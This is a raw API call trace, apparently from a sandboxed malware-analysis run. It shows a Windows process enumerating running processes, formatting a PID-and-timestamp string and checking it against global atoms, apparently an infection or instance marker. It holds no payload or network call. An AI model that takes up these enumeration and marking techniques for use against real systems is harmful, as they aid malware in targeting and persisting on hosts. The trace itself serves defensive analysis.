	[0133.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.643] CloseHandle (hObject=0x2dc) returned 1
	[0133.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.643] CloseHandle (hObject=0x2dc) returned 1
	[0133.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.643] CloseHandle (hObject=0x2dc) returned 1
	[0133.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0133.644] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.644] CloseHandle (hObject=0x2dc) returned 1
	[0133.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.644] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.644] CloseHandle (hObject=0x2dc) returned 1
	[0133.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.645] CloseHandle (hObject=0x2dc) returned 1
	[0133.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.645] CloseHandle (hObject=0x2dc) returned 1
	[0133.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.646] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.646] CloseHandle (hObject=0x2dc) returned 1
	[0133.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.646] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.646] CloseHandle (hObject=0x2dc) returned 1
	[0133.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0133.646] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.647] CloseHandle (hObject=0x2dc) returned 1
	[0133.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0133.647] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.647] CloseHandle (hObject=0x2dc) returned 1
	[0133.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.647] GetLastError () returned 0x5
	[0133.647] GetLastError () returned 0x5
	[0133.647] GetLastError () returned 0x5
	[0133.647] GetLastError () returned 0x5
	[0133.647] GetLastError () returned 0x5
	[0133.647] GetLastError () returned 0x5
	[0133.647] GetLastError () returned 0x5
	[0133.647] GetLastError () returned 0x5
	[0133.647] GetLastError () returned 0x5
	[0133.647] GetLastError () returned 0x5
	[0133.647] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.648] GetLastError () returned 0x5
	[0133.649] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.649] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0133.649] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.649] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.650] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetLastError () returned 0x5
	[0133.651] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.652] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0133.652] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.652] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0133.652] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0133.652] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0133.652] CloseHandle (hObject=0x2dc) returned 1
	[0133.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0133.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.653] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.653] CloseHandle (hObject=0x2dc) returned 1
	[0133.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.653] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.653] CloseHandle (hObject=0x2dc) returned 1
	[0133.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.654] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.654] CloseHandle (hObject=0x2dc) returned 1
	[0133.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.654] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.654] CloseHandle (hObject=0x2dc) returned 1
	[0133.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0133.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.655] CloseHandle (hObject=0x2dc) returned 1
	[0133.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0133.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.693] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.693] CloseHandle (hObject=0x2dc) returned 1
	[0133.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.694] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.694] CloseHandle (hObject=0x2dc) returned 1
	[0133.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0133.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.694] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.694] CloseHandle (hObject=0x2dc) returned 1
	[0133.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.695] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.695] CloseHandle (hObject=0x2dc) returned 1
	[0133.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.695] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.695] CloseHandle (hObject=0x2dc) returned 1
	[0133.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.696] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.696] CloseHandle (hObject=0x2dc) returned 1
	[0133.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.696] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.696] CloseHandle (hObject=0x2dc) returned 1
	[0133.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.697] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.697] CloseHandle (hObject=0x2dc) returned 1
	[0133.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.697] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.697] CloseHandle (hObject=0x2dc) returned 1
	[0133.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.698] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.698] CloseHandle (hObject=0x2dc) returned 1
	[0133.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.698] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.698] CloseHandle (hObject=0x2dc) returned 1
	[0133.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.699] CloseHandle (hObject=0x2dc) returned 1
